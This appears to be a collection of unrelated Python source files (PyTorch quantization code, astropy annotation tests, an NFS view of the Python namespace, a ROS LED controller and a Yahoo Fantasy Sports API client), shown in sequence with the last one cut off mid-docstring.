min_values = _deflatten_as(x_flat.min(-1)[0], x)
max_values = _deflatten_as(x_flat.max(-1)[0], x)
if reduce_dim is not None: # 如果reduce_dim 不是None,那么进行相应的处理(缩减相应的维度),但是keepdim
if reduce_type == 'mean':
min_values = min_values.mean(reduce_dim, keepdim=keepdim)
max_values = max_values.mean(reduce_dim, keepdim=keepdim)
else:
min_values = min_values.min(reduce_dim, keepdim=keepdim)[0]
max_values = max_values.max(reduce_dim, keepdim=keepdim)[0]
range_values = max_values - min_values # 得到最大最小值之间的范围结果,之后注册一个QParams的类
return QParams(range=range_values, zero_point=min_values,
num_bits=num_bits)
# 这个类定义了一个均匀量化的基本处理,包括了前向和反向的过程
class UniformQuantize(InplaceFunction):
@staticmethod
def forward(ctx, input, num_bits=None, qparams=None, flatten_dims=_DEFAULT_FLATTEN,
reduce_dim=0, dequantize=True, signed=False, stochastic=False, inplace=False):
ctx.inplace = inplace
if ctx.inplace:
ctx.mark_dirty(input)
output = input
else:
output = input.clone()
if qparams is None:
assert num_bits is not None, "either provide qparams of num_bits to quantize"
qparams = calculate_qparams(
input, num_bits=num_bits, flatten_dims=flatten_dims, reduce_dim=reduce_dim)
# 如果没有直接给出qparams,那么就通过计算来得到相应的结果
zero_point = qparams.zero_point
num_bits = qparams.num_bits
qmin = -(2. ** (num_bits - 1)) if signed else 0. # 是进行有符号还是无符号的量化
qmax = qmin + 2. ** num_bits - 1.
scale = qparams.range / (qmax - qmin) # 那么可以得到相应的scale,也就是直接通过range来得到
min_scale = torch.tensor(1e-8).expand_as(scale).cuda() # 最小的scale
scale = torch.max(scale, min_scale) # 然后设置一个scale 的 比较
with torch.no_grad():
output.add_(qmin * scale - zero_point).div_(scale)
if stochastic:
noise = output.new(output.shape).uniform_(-0.5, 0.5)
output.add_(noise)
# quantize
output.clamp_(qmin, qmax).round_()
if dequantize:
output.mul_(scale).add_(
zero_point - qmin * scale) # dequantize
return output
@staticmethod
def backward(ctx, grad_output):
# straight-through estimator
grad_input = grad_output # STE 方法, 量化部分不改变实际的权重的梯度
return grad_input, None, None, None, None, None, None, None, None
class UniformQuantizeGrad(InplaceFunction):
@staticmethod
def forward(ctx, input, num_bits=None, qparams=None, flatten_dims=_DEFAULT_FLATTEN_GRAD,
reduce_dim=0, dequantize=True, signed=False, stochastic=True):
ctx.num_bits = num_bits
ctx.qparams = qparams
ctx.flatten_dims = flatten_dims
ctx.stochastic = stochastic
ctx.signed = signed
ctx.dequantize = dequantize
ctx.reduce_dim = reduce_dim
ctx.inplace = False
return input
@staticmethod
def backward(ctx, grad_output):
qparams = ctx.qparams
with torch.no_grad():
if qparams is None:
assert ctx.num_bits is not None, "either provide qparams of num_bits to quantize"
qparams = calculate_qparams(
grad_output, num_bits=ctx.num_bits, flatten_dims=ctx.flatten_dims, reduce_dim=ctx.reduce_dim,
reduce_type='extreme')
grad_input = quantize(grad_output, num_bits=None,
qparams=qparams, flatten_dims=ctx.flatten_dims, reduce_dim=ctx.reduce_dim,
dequantize=True, signed=ctx.signed, stochastic=ctx.stochastic, inplace=False)
return grad_input, None, None, None, None, None, None, None
def quantize(x, num_bits=None, qparams=None, flatten_dims=_DEFAULT_FLATTEN, reduce_dim=0, dequantize=True, signed=False,
stochastic=False, inplace=False):
# 这里有两种量化方式,一种是通过qparams 来进行控制,而另一种是通过num_bits 来进行控制
if qparams: # 当有相应的范围参数的时候
if qparams.num_bits: # 如果设置了相应的num_bits
return UniformQuantize().apply(x, num_bits, qparams, flatten_dims, reduce_dim, dequantize, signed,
stochastic, inplace)
elif num_bits:
return UniformQuantize().apply(x, num_bits, qparams, flatten_dims, reduce_dim, dequantize, signed, stochastic,
inplace)
return x
def quantize_grad(x, num_bits=None, qparams=None, flatten_dims=_DEFAULT_FLATTEN_GRAD, reduce_dim=0, dequantize=True,
signed=False, stochastic=True):
if qparams:
if qparams.num_bits:
return UniformQuantizeGrad().apply(x, num_bits, qparams, flatten_dims, reduce_dim, dequantize, signed,
stochastic)
elif num_bits:
return UniformQuantizeGrad().apply(x, num_bits, qparams, flatten_dims, reduce_dim, dequantize, signed,
stochastic)
return x
class QuantMeasure(nn.Module):
"""docstring for QuantMeasure."""
def __init__(self, shape_measure=(1,), flatten_dims=_DEFAULT_FLATTEN,
inplace=False, dequantize=True, stochastic=False, momentum=0.9, measure=False):
super(QuantMeasure, self).__init__()
self.register_buffer('running_zero_point', torch.zeros(*shape_measure))
self.register_buffer('running_range', torch.zeros(*shape_measure))
self.measure = measure
if self.measure:
self.register_buffer('num_measured', torch.zeros(1))
self.flatten_dims = flatten_dims
self.momentum = momentum
self.dequantize = dequantize
self.stochastic = stochastic
self.inplace = inplace
def forward(self, input, num_bits, qparams=None):
if self.training or self.measure:
if qparams is None:
qparams = calculate_qparams(
input, num_bits=num_bits, flatten_dims=self.flatten_dims, reduce_dim=0, reduce_type='extreme')
with torch.no_grad():
if self.measure:
momentum = self.num_measured / (self.num_measured + 1)
self.num_measured += 1
else:
momentum = self.momentum
self.running_zero_point.mul_(momentum).add_(
qparams.zero_point * (1 - momentum))
self.running_range.mul_(momentum).add_(
qparams.range * (1 - momentum))
else:
qparams = QParams(range=self.running_range,
zero_point=self.running_zero_point, num_bits=num_bits)
if self.measure:
return input
else:
q_input = quantize(input, qparams=qparams, dequantize=self.dequantize,
stochastic=self.stochastic, inplace=self.inplace)
return q_input
class CPTConv2d(nn.Conv2d):
"""docstring for QConv2d."""
def __init__(self, in_channels, out_channels, kernel_size,
stride=1, padding=0, dilation=1, groups=1, bias=True):
super(CPTConv2d, self).__init__(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups, bias)
self.quantize_input = QuantMeasure(shape_measure=(1, 1, 1, 1), flatten_dims=(1, -1))
self.stride = stride
def forward(self, input, actbits, wbits, gbits):
if actbits == 0 and wbits==0:
output = F.conv2d(input, self.weight, self.bias, self.stride, self.padding, self.dilation, self.groups)
return output
if self.bias is not None:
qbias = quantize(
self.bias, num_bits=self.num_bits,
flatten_dims=(0, -1))
else:
qbias = None
weight_qparams = calculate_qparams(self.weight, num_bits=wbits, flatten_dims=(1, -1),
reduce_dim=None)
qweight = quantize(self.weight, qparams=weight_qparams)
qinput = self.quantize_input(input, actbits)
output = F.conv2d(qinput, qweight, qbias, self.stride, self.padding, self.dilation, self.groups)
output = quantize_grad(output, num_bits=gbits, flatten_dims=(1, -1))
return output
# if __name__ == '__main__':
# x = torch.rand(2, 3)
# x_q = quantize(x, flatten_dims=(-1), num_bits=8, dequantize=True)
# print(x)
# print(x_q)
if __name__ == '__main__':
x = torch.randn(32, 3, 16, 16)
calculate(x, num_bits=8, flatten_dims=_DEFAULT_FLATTEN_GRAD)
|
python
|
import pytest
from astropy import units as u
from astropy.coordinates import SkyCoord
from imephu.annotation.general import CircleAnnotation, RectangleAnnotation
from imephu.finder_chart import FinderChart
def test_rectangle_annotation(fits_file, check_finder):
"""Test rectangle annotations."""
finder_chart = FinderChart(fits_file)
rectangle_annotation = RectangleAnnotation(
SkyCoord(ra="00h39m30s", dec="-59d59m00s"),
width=150 * u.arcsec,
height=2 * u.arcmin,
wcs=finder_chart.wcs,
edgecolor="none",
facecolor="blue",
alpha=0.2,
)
finder_chart.add_annotation(rectangle_annotation)
check_finder(finder_chart)
@pytest.mark.parametrize("angle", [0 * u.deg, 45 * u.deg])
def test_rectangle_annotation_rotated(
angle, fits_file, fits_center, check_finder, legend
):
"""Test rotated rectangle annotations."""
finder_chart = FinderChart(fits_file)
rectangle_annotation = RectangleAnnotation(
fits_center,
width=300 * u.arcsec,
height=150 * u.arcsec,
wcs=finder_chart.wcs,
edgecolor="none",
facecolor="gray",
alpha=0.2,
)
rotated_rectangle_annotation = rectangle_annotation.rotate(fits_center, angle)
rotated_rectangle_annotation._kwargs["facecolor"] = "blue"
pivot_marker = CircleAnnotation(
fits_center,
12 * u.arcsec,
wcs=finder_chart.wcs,
edgecolor="none",
facecolor="orange",
alpha=0.7,
)
finder_chart.add_annotation(pivot_marker)
finder_chart.add_annotation(rectangle_annotation)
finder_chart.add_annotation(rotated_rectangle_annotation)
finder_chart.add_annotation(
legend(f"Rotated by {angle.to_value(u.deg)} deg", wcs=finder_chart.wcs)
)
check_finder(finder_chart)
@pytest.mark.parametrize("displacement", [(0, 0) * u.arcmin, (2.5, -2) * u.arcmin])
def test_rectangle_annotation_translated(
displacement, fits_file, fits_center, check_finder, legend
):
"""Test translated rectangle annotations."""
finder_chart = FinderChart(fits_file)
rectangle_annotation = RectangleAnnotation(
fits_center,
width=100 * u.arcsec,
height=200 * u.arcsec,
wcs=finder_chart.wcs,
edgecolor="none",
facecolor="gray",
alpha=0.2,
)
translated_rectangle_annotation = rectangle_annotation.translate(displacement)
translated_rectangle_annotation._kwargs["facecolor"] = "blue"
finder_chart.add_annotation(rectangle_annotation)
finder_chart.add_annotation(translated_rectangle_annotation)
finder_chart.add_annotation(
legend(
f"Translated by {displacement.to_value(u.arcmin)} arcmin",
wcs=finder_chart.wcs,
)
)
check_finder(finder_chart)
|
python
|
#!/usr/bin/env python
# This file should be available from
# http://www.pobox.com/~asl2/software/Pinefs
# and is licensed under the X Consortium license:
# Copyright (c) 2003, Aaron S. Lav, [email protected]
# All rights reserved.
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, and/or sell copies of the Software, and to permit persons
# to whom the Software is furnished to do so, provided that the above
# copyright notice(s) and this permission notice appear in all copies of
# the Software and that both the above copyright notice(s) and this
# permission notice appear in supporting documentation.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
# OF THIRD PARTY RIGHTS. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# HOLDERS INCLUDED IN THIS NOTICE BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL
# INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING
# FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
# NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
# WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
# Except as contained in this notice, the name of a copyright holder
# shall not be used in advertising or otherwise to promote the sale, use
# or other dealings in this Software without prior written authorization
# of the copyright holder.
"""Pyfs provides a view of Python namespace (rooted at sys.modules) as
a NFS filesystem. The implementation is imperfect, because I can't
think of anything in Python which can be used for the 'fileid'
attribute or the filehandle, independent of either the contents of the
object or its place in the filesystem. The compromise is to use a
cache (FileSystem._objs) to make sure that the same python directory
obj (defined as either an instance of a subclass of dict or dictproxy,
or an object which has a '__dict__' attribute) is always wrapped by
the same FileObj. All other objects (e.g. Python integers, strings)
are wrapped by a new FileObj (with a new fileid) for each different
access path through the Python namespace.
In order to handle writing to immutable types (such as strings and
integers), each FileObj contains the parent dictionary and key through
which it was first encountered, and writing to regular files is
implemented by creating a new object and binding it as the new value
for that key in the parent dictionary. (For writing to directories,
the dictionary is mutated in place.) The new object's value is obtained
by stringifying the value (with str()), creating a new string by
replacing the indicated part of the old string, and then passing the
new string to type(val). If the type object (e.g. for functions)
doesn't accept a string as parameter, we report NFSERR_ACCES. (Yes,
this is a bunch of overhead.)
For directories, instead of just using the __dict__, we probably
should track the logic used in 'dir' (or just call 'dir'), while being
aware that accesses to attributes returned from dir can raise
AttributeError (e.g. __slots__). Currently, we don't implement access
to the __class__ attribute of class instances, attributes defined with
__slots__ (or other attributes defined by means of attribute
descriptors), or to dynamically-generated attributes generated by
manipulating __getattr__/__getattribute__. (The general problem seems
insoluble, at least without an assist from the __members__ attribute.)
Note that hard links to non-directories don't work with this system.
(A hard link request is currently implemented as a copy.) To fix this, a
FileObj could have a list of (parent_dict, key) tuples, and a write
would iterate over the list and rebind each parent_dict[key].
XXX This code isn't safe if the Python side mutates directories
exactly when the NFS code is reading them. When it's rewritten to be
safe, test by pausing NFS code at important points (e.g. inside
refresh_dir), waiting for the user to mutate stuff at the python
console, and then signal to continue from console.
Here's a useless example (except for testing purposes):
find . -name __doc__ -noleaf -exec grep "maxint" \{\} /dev/null \;
(executed in root of NFS mount)
Note that there are many paths through the Python namespace to the
module sys, which currently has the only docstring with maxint in it
(unless this module is imported), and that find prints all of them.
(pyfs returns the same filehandle and fileid each time, so it is
possible to realize they're all duplicates.)
"""
import sys
import string
import rfc1094
import fsbase
import types
trace_fh = 0
def get_dict (obj):
if isinstance (obj, types.DictType) or isinstance (obj, types.DictProxyType):
return obj
return getattr (obj, '__dict__', None)
# sometimes obj has a __dict__ attribute which is None. This
# still does what we want.
class FileObj(fsbase.FileObj):
fileid_ctr = fsbase.Ctr (randomize_start = 1)
# can't g'tee persistence of file ids, 2nd best is to
# randomize them so previous incarnations will get ESTALE
def __init__ (self, parent_dict, key, fs):
self.fs = fs
self.parent_dict = parent_dict
self.key = key
self.fileid = self.fileid_ctr.next ()
obj = self.parent_dict [self.key]
dict = get_dict (obj)
if dict <> None:
self.set_dict (dict)
else:
self.type = rfc1094.NFREG
self.data = self.get_data ()
nlink = self.get_nlink ()
# XXX ideally this would be property, but interacts poorly w/
# getattr in fsbase
fsbase.FileObj.__init__ (self)
def get_nlink (self):
if self.type == rfc1094.NFDIR:
return sys.getrefcount (self.parent_dict[self.key])
else:
return 1
def set_dict (self, dict_obj):
self.type = rfc1094.NFDIR
self.dict = dict_obj
self.size = len (dict_obj)
self.dir = {}
self.blocks = 1
def get_data (self):
try:
return str (self.parent_dict[self.key])
except KeyError, k:
print "weird, key %s missing from %s" % (str(self.key),
str(self.parent_dict.keys()))
return ''
def read (self, offset, count):
self.data = self.get_data ()
return self.data [offset: offset + count]
def write (self, offset, newdata):
old_data = self.get_data ()
old_len = len (old_data)
if offset > old_len:
fill = '\0' * (offset - old_len)
else:
fill = ''
new_data = (old_data[:offset] + fill + newdata +
old_data[offset + len (newdata):])
self.change_val (new_data)
def change_val (self, *args):
try:
new_val = type(self.parent_dict[self.key]) (*args)
except (TypeError, ValueError):
raise fsbase.NFSError (rfc1094.NFSERR_ACCES)
self.parent_dict[self.key] = new_val
self.data = self.get_data ()
self.set_size ()
# This is "rebind", not "mutate".
self.mtime = fsbase.mk_now ()
def truncate (self):
"""Note that for non-strings, 0-len data is usually invalid, so we
interpret 'truncate' liberally"""
self.change_val ()
def check_changed (self):
"""Called on every access. Stringifies data, and compares it
with old value to see if it's changed (so that when the python
side changes a value, we reflect that with a changed mtime in
GETATTR, and the NFS client can reread if necesary.This is
comparatively heavyweight, and maybe there should be a flag to
turn it off."""
if self.type <> rfc1094.NFDIR:
new_data = self.get_data ()
if new_data <> self.data:
self.mtime = fsbase.mk_now ()
self.data = new_data
self.set_size ()
# __{get,set,del}item__ are implemented to ease manipulating both self.dict
# (the dict of the python object, with python objects as vals) and self.dir,
# which contains NFS file handles for those objects, at the same time,
# and keeping them consistent. They take and return tuples of (fh, obj)
def __getitem__ (self, key):
return self.dir [key], self.dict [key]
def __setitem__ (self, key, val):
fh, obj = val
self.dict [key] = obj
self.dir [key] = fh
def __delitem__ (self, key):
del self.dict [key] # try dict first!
del self.dir [key]
def set_dir (self, key, fh):
if fh <> None:
self.dir [key] = fh
else:
del self.dir [key]
def get_dir (self):
# It would be nice if there were a cheap way to tell if
# self.dict had changed at all, rather than just checking for
# length changes. So we miss some alterations. I guess we
# could have a timestamp, so we refresh the directory when the
# length changes, or every n seconds. Alternately, we could
# just save old_dict and compare .items (), since we're doing
# the moral equivalent for files.
if self.dir == None or len(self.dir) <> len (self.dict):
self.refresh_dir ()
return self.dir
def refresh_dir (self):
# exclude _fils, _objs to avoid apps traversing entire directory tree
# from looping forever
if (self.dict <> self.fs._fils and
self.dict <> self.fs._objs):
old_dir = self.dir
self.dir = {}
# Avoid names with '/' because my Linux 2.4.19 seems to get slightly
# confused with them. (E.g. a name of '/' by itself is a link to the
# root of the directory hierarchy, even if it's a Python string and
# thus ought to be a leaf.) Ideally I'd escape them, so they were
# still accessible somehow.
# XXX Avoiding '/'s means len's won't match, we'll refresh every time through
for (k, v) in self.dict.items ():
if isinstance (k, type ('')):
if k.find ('/') <> -1:
continue
fh = old_dir.get (k, None)
if fh == None:
fh = self.fs.find_or_create (self.dict, k)
else:
del old_dir [k]
self.dir [str(k)] = fh
# XXX old_dir now contains filehandles that there may be no other way
# to reach (certainly if they refer to non-directories).
# On one hand, to provide Unix semantics, if the client still
# has that filehandle, it can refer to it forever:
# on the other, it's a memory leak (from fs._fils and fs._objs)
# if it does. Note that the only way this can arise is to
# delete things from the python side, since any manipulation
# through the NFS side maintains dict and dir in sync (unless it's buggy).
# Maybe the way to resolve this is to keep a link count for directory-like
# objects (since we can rely on identity for them), purging when the link
# count reaches 0: for others, put the filehandles in a dictionary
# of fh's to be purged, and
# - keep them in, er, purgatory (resetting the last access time) if they're
# used by a client through an old file handle
# - otherwise delete them after a decent interval
def mk_link (self, name, from_fh):
from_fil = self.fs.get_fil (from_fh)
self.dict [name] = from_fil.parent_dict [from_fil.key]
self.set_dir (name,from_fh)
class FileSystem:
def __init__ (self):
self._fh_ctr = fsbase.Ctr (randomize_start = 1)
self._fils = {} # map fh to FileObj
self._objs = {} # map id to (obj, fh)
self._root = self.find_or_create (sys.__dict__, 'modules')
def mount (self, dirpath):
if dirpath == '/':
return self._root
return None
def find_or_create (self, dict, key):
py_obj = dict[key]
d = get_dict (py_obj)
if d <> None:
tup = self._objs.get (id (py_obj))
else:
tup = None
if tup == None:
fh = self._fh_ctr.next_fh ()
fattr = FileObj (dict, key, self)
if trace_fh: print "creating fh %s key %s" % (fh, str(key))
self._fils [fh] = fattr
if d <> None:
self._objs [id(py_obj)] = (py_obj, fh)
return fh
else:
# XXX tup [0] should be weak ref, but until then, we're
# certain that tup [0] == py_obj
assert (tup [0] == py_obj)
fh = tup [1]
return fh
def get_fil (self, fh):
f = self._fils.get (fh, None)
if f <> None:
f.check_changed ()
f.atime = fsbase.mk_now ()
return f
def rename (self, old_dir, old_name, new_dir, new_name):
# print "rename", old_name, new_name
old_fil = self.get_fil (old_dir)
new_fil = self.get_fil (new_dir)
move_fh = old_fil.get_dir () [old_name]
move_fil = self.get_fil (move_fh)
new_fil [new_name] = (move_fh, move_fil.parent_dict [move_fil.key])
move_fil.key = new_name
del old_fil [old_name]
def create_fil (self, dir_fh, name, **kw):
dir_fil = self.get_fil (dir_fh)
if kw['type'] == rfc1094.NFDIR:
new_val = {}
else:
new_val = kw.get ('data', '')
dir_fil.refresh_dir ()
dir_fil.dict [name] = new_val
fh = self.find_or_create (dir_fil.dict, name)
dir_fil.set_dir (name,fh)
return fh, self.get_fil (fh)
def remove (self, dir_fh, name):
dir_fil = self.get_fil (dir_fh)
try:
old_fh = dir_fil.get_dir ()[name]
old_fil = self.get_fil (old_fh)
py_obj = old_fil.parent_dict [old_fil.key]
if old_fil.type == rfc1094.NFDIR:
if old_fil.dict <> {}:
raise fsbase.NFSError (rfc1094.NFSERR_NOTEMPTY)
del dir_fil[name]
except TypeError:
# NFSERR_ACCES isn't quite right, because it implies
# that some user could delete this.
raise fsbase.NFSError (rfc1094.NFSERR_ACCES)
except KeyError:
raise fsbase.NFSError (rfc1094.NFSERR_NOENT)
del self._fils [old_fh]
d = get_dict (py_obj)
if d <> None:
del self._objs [id(py_obj)]
|
python
|
#!/usr/bin/env python
import rospy
import cv2
from sensor_msgs.msg import Image
from std_msgs.msg import Float64MultiArray, UInt8
from std_srvs.srv import Trigger, TriggerResponse
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
from scipy import optimize
import time
class linear_controller(object):
def __init__(self):
# ROS Framework
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("~image_raw", Image, self.image_cb)
self.led_sub = rospy.Subscriber("~pwm", Float64MultiArray, self.led_cb)
self.led_pub = rospy.Publisher("~pwm", Float64MultiArray, queue_size=10)
self.calibrate_srv = rospy.Service("~calibrate", Trigger, self.calibrate)
self.mask_capture_srv = rospy.Service("~capture", Trigger, self.capture_masks)
self.level_sub = rospy.Subscriber("~level", UInt8, self.update_leds)
# ROS Parameters
self.pre_flash_value = rospy.get_param("~pre_flash_value", 0.5)
self.pre_flash_time = rospy.get_param("~pre_flash_time", 0.1)
self.image_width = rospy.get_param("~image_width", 2048)
self.image_height = rospy.get_param("~image_height", 1536)
self.cropped_width = rospy.get_param("~cropped_width", 500)
self.cropped_height = rospy.get_param("~cropped_height", self.image_height)
self.led_a = rospy.get_param("~led_a", 1)
self.led_b = rospy.get_param("~led_b", 1)
self.led_c = rospy.get_param("~led_c", 0)
self.led_d = rospy.get_param("~led_d", 0)
self.n_leds = self.led_a + self.led_b + self.led_c + self.led_d
self.debug = rospy.get_param("~debug", True)
# LED Mapping Array
self.led_array = []
if self.led_a == 1:
self.led_array.append(0)
if self.led_b == 1:
self.led_array.append(1)
if self.led_c == 1:
self.led_array.append(2)
if self.led_d == 1:
self.led_array.append(3)
# Current State of LED's
self.initialized = False
self.current_state = None
self.background = np.zeros([self.cropped_height, self.cropped_width])
self.last_frame = None
# Control Matrices
self.responses = [None, None, None, None]
self.A_initialized = False
self.A = np.zeros([self.cropped_height * self.cropped_width, self.n_leds])
self.control = np.array([0.0, 0.0, 0.0, 0.0])
# Set LED's to zero
level = UInt8()
level.data = 0
self.update_leds(level)
# Perform Least Squares Regression and Output new LED Values
def update_leds(self, level):
b = level.data * np.ones(self.cropped_height * self.cropped_width)
if self.A_initialized:
if self.debug:
ver = 2
else:
ver = 0
# solve least squares
sol = optimize.lsq_linear(self.A, b, bounds=(0.0, 1.0), verbose=ver)
if self.debug:
print("Least Squares Solution: ")
print(sol)
x = sol.x
# update led control
self.control = np.array([0.0, 0.0, 0.0, 0.0])
for i in range(len(x)):
self.control[self.led_array[i]] = x[i]
# publish control
msg = Float64MultiArray()
msg.data = self.control
self.led_pub.publish(msg)
# Handle incoming led messages
def led_cb(self, msg):
self.current_state = np.array(msg.data)
self.initialized = True
# Handle incoming images
def image_cb(self, img):
try:
cv_image = self.bridge.imgmsg_to_cv2(img, "bgr8")
except CvBridgeError as e:
print(e)
hsv = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)
h, s, v = cv2.split(hsv)
# Crop Image
image_horz_center = int(self.image_width / 2.0)
image_vert_center = int(self.image_height / 2.0)
v = v[image_vert_center - int(self.cropped_height / 2.0):image_vert_center + int(
self.cropped_height / 2.0),
image_horz_center - int(self.cropped_width / 2.0):image_horz_center + int(self.cropped_width / 2.0)]
self.last_frame = np.array(v)
# save new response matrix
if self.initialized and sum(self.current_state) == self.pre_flash_value and (sum(self.current_state > 0) == 1):
current_led = self.current_state.nonzero()[0][0]
normalized_response = np.rint(np.array(v) / self.pre_flash_value)
self.responses[current_led] = normalized_response
print("Got New Frame for LED: " + str(current_led))
# save background calibration
if self.initialized and sum(self.current_state) < 1e-6:
self.background = np.array(v)
print("Got New Background Frame")
# Convert the responses to the A matrix.
def calibrate(self, srv):
response_matrices = []
for i in range(len(self.responses)):
if self.responses[i] is not None:
response_matrices.append(self.responses[i] - self.background)
for i in range(len(response_matrices)):
self.A[:, i] = response_matrices[i].flatten()
if len(response_matrices) == self.n_leds:
self.A_initialized = True
return TriggerResponse(True, "Complete A")
elif len(response_matrices) > 0:
return TriggerResponse(True, "Partial A")
else:
return TriggerResponse(False, "Empty A")
# automatically trigger led's and capture mask
def capture_masks(self, srv):
for i in range(self.n_leds):
# activate one LED
self.control = np.array([0.0, 0.0, 0.0, 0.0])
self.control[self.led_array[i]] = self.pre_flash_value
# publish control
msg = Float64MultiArray()
msg.data = self.control
self.led_pub.publish(msg)
# wait for some time for frames to be captured
time.sleep(self.pre_flash_time)
# turn off led's after capture
self.control = np.array([0.0, 0.0, 0.0, 0.0])
msg.data = self.control
self.led_pub.publish(msg)
return self.calibrate(None)
if __name__ == '__main__':
rospy.init_node("linear_controller")
node = linear_controller()
try:
rospy.spin()
except rospy.ROSInterruptException:
print("Shutting Down.")
cv2.destroyAllWindows()
|
python
|
#!/bin/python
import datetime
YAHOO_ENDPOINT = 'https://fantasysports.yahooapis.com/fantasy/v2'
class YHandler:
"""Class that constructs the APIs to send to Yahoo"""
def __init__(self, sc):
self.sc = sc
def __getattribute__(self, attr):
cred = super(YHandler, self).__getattribute__(attr)
if attr == 'sc':
if not cred.token_is_valid():
cred.refresh_access_token()
# bug in yahoo-auth, does not update session when access token updated
cred.session = cred.oauth.get_session(token=cred.access_token)
return cred
def get(self, uri):
"""Send an API request to the URI and return the response as JSON
:param uri: URI of the API to call
:type uri: str
:return: JSON document of the response
:raises: RuntimeError if any response comes back with an error
"""
response = self.sc.session.get("{}/{}".format(YAHOO_ENDPOINT, uri),
params={'format': 'json'})
if response.status_code != 200:
raise RuntimeError(response.content)
jresp = response.json()
return jresp
def put(self, uri, data):
"""Calls the PUT method to the uri with a payload
:param uri: URI of the API to call
:type uri: str
:param data: What to pass as the payload
:type data: str
:return: XML document of the response
:raises: RuntimeError if any response comes back with an error
"""
headers = {'Content-Type': 'application/xml'}
response = self.sc.session.put("{}/{}".format(YAHOO_ENDPOINT, uri),
data=data, headers=headers)
if response.status_code != 200:
raise RuntimeError(response.content)
return response
def post(self, uri, data):
"""Calls the POST method to the URI with a payload
:param uri: URI of the API to call
:type uri: str
:param data: What to pass as the payload
:type data: str
:return: XML document of the response
:raises: RuntimeError if any response comes back with an error
"""
headers = {'Content-Type': 'application/xml'}
response = self.sc.session.post("{}/{}".format(YAHOO_ENDPOINT, uri),
data=data, headers=headers)
if response.status_code != 201:
raise RuntimeError(response.content)
return response
def get_teams_raw(self):
"""Return the raw JSON when requesting the logged in players teams.
:return: JSON document of the request.
"""
return self.get("users;use_login=1/games/teams")
def get_standings_raw(self, league_id):
"""Return the raw JSON when requesting standings for a league.
:param league_id: League ID to get the standings for
:type league_id: str
:return: JSON document of the request.
"""
return self.get("league/{}/standings".format(league_id))
def get_settings_raw(self, league_id):
"""Return the raw JSON when requesting settings for a league.
:param league_id: League ID to get the standings for
:type league_id: str
:return: JSON document of the request.
"""
return self.get("league/{}/settings".format(league_id))
def get_matchup_raw(self, team_key, week):
"""Return the raw JSON when requesting match-ups for a team
:param team_key: Team key identifier to find the matchups for
:type team_key: str
:param week: What week number to request the matchup for?
:type week: int
:return: JSON of the request
"""
return self.get("team/{}/matchups;weeks={}".format(team_key, week))
def get_roster_raw(self, team_key, week=None, day=None):
"""Return the raw JSON when requesting a team's roster
Can request a roster for a given week or a given day. If neither is
given the current day's roster is returned.
:param team_key: Team key identifier to find the matchups for
:type team_key: str
:param week: What week number to request the roster for?
:type week: int
:param day: What day number to request the roster
:type day: datetime.date
:return: JSON of the request
"""
if week is not None:
param = ";week={}".format(week)
elif day is not None:
param = ";date={}".format(day.strftime("%Y-%m-%d"))
else:
param = ""
return self.get("team/{}/roster{}".format(team_key, param))
def get_scoreboard_raw(self, league_id, week=None):
"""Return the raw JSON when requesting the scoreboard for a week
:param league_id: League ID to get the standings for
:type league_id: str
:param week: The week number to request the scoreboard for
:type week: int
:return: JSON document of the request.
"""
week_uri = ""
if week is not None:
week_uri = ";week={}".format(week)
return self.get("league/{}/scoreboard{}".format(league_id, week_uri))
def get_players_raw(self, league_id, start, status, position=None, sub_resource='percent_owned'):
"""Return the raw JSON when requesting players in the league
The result is limited to 25 players.
:param league_id: League ID to get the players for
:type league_id: str
:param start: The output is paged at 25 players each time. Use this
parameter for subsequent calls to get the players at the next page.
For example, you specify 0 for the first call, 25 for the second call,
etc.
:type start: int
:param status: A filter to limit the player status. Available values
are: 'A' - all available; 'FA' - free agents; 'W' - waivers, 'T' -
taken players, 'K' - keepers
:type status: str
:param position: A filter to return players only for a specific
position. If None is passed, then no position filtering occurs.
:type position: str
:return: JSON document of the request.
"""
if position is None:
pos_parm = ""
else:
pos_parm = ";position={}".format(position)
return self.get(
"league/{}/players;start={};count=25;status={}{}{}".
format(league_id, start, status, pos_parm, '/' + sub_resource))
def get_player_raw(self, league_id, player_name):
"""Return the raw JSON when requesting player details
:param league_id: League ID to get the player for
:type league_id: str
:param player_name: Name of player to get the details for
:type player_name: str
:return: JSON document of the request.
"""
player_stat_uri = ""
if player_name is not None:
player_stat_uri = "players;search={}/stats".format(player_name)
return self.get("league/{}/{}".format(league_id, player_stat_uri))
def get_percent_owned_raw(self, league_id, player_ids):
"""Return the raw JSON when requesting the percentage owned of players
:param league_id: League ID we are requesting data from
:type league_id: str
:param player_ids: Yahoo! Player IDs to retrieve % owned for
:type player_ids: list(str)
:return: JSON document of the request
"""
lg_pref = league_id[0:league_id.find(".")]
joined_ids = ",".join([lg_pref + ".p." + str(i) for i in player_ids])
return self.get(
"league/{}/players;player_keys={}/percent_owned".
format(league_id, joined_ids))
def put_roster(self, team_key, xml):
"""Calls PUT against the roster API passing it an xml document
:param team_key: The key of the team the roster move applies too
:type team_key: str
:param xml: The XML document to send
:type xml: str
:return: Response from the PUT
"""
return self.put("team/{}/roster".format(team_key), xml)
def post_transactions(self, league_id, xml):
"""Calls POST against the transaction API passing it an xml document
:param league_id: The league ID that the API request applies to
:type league_id: str
:param xml: The XML document to send as the payload
:type xml: str
:return: Response from the POST
"""
return self.post("league/{}/transactions".format(league_id), xml)
def get_team_transactions(self, league_id, team_key, tran_type):
"""
Calls GET to retrieve transactions for a team of a given type.
:param league_id: The league ID that the API request applies to
:type league_id: str
:param team_key: The key of the team the roster move applies too
:type team_key: str
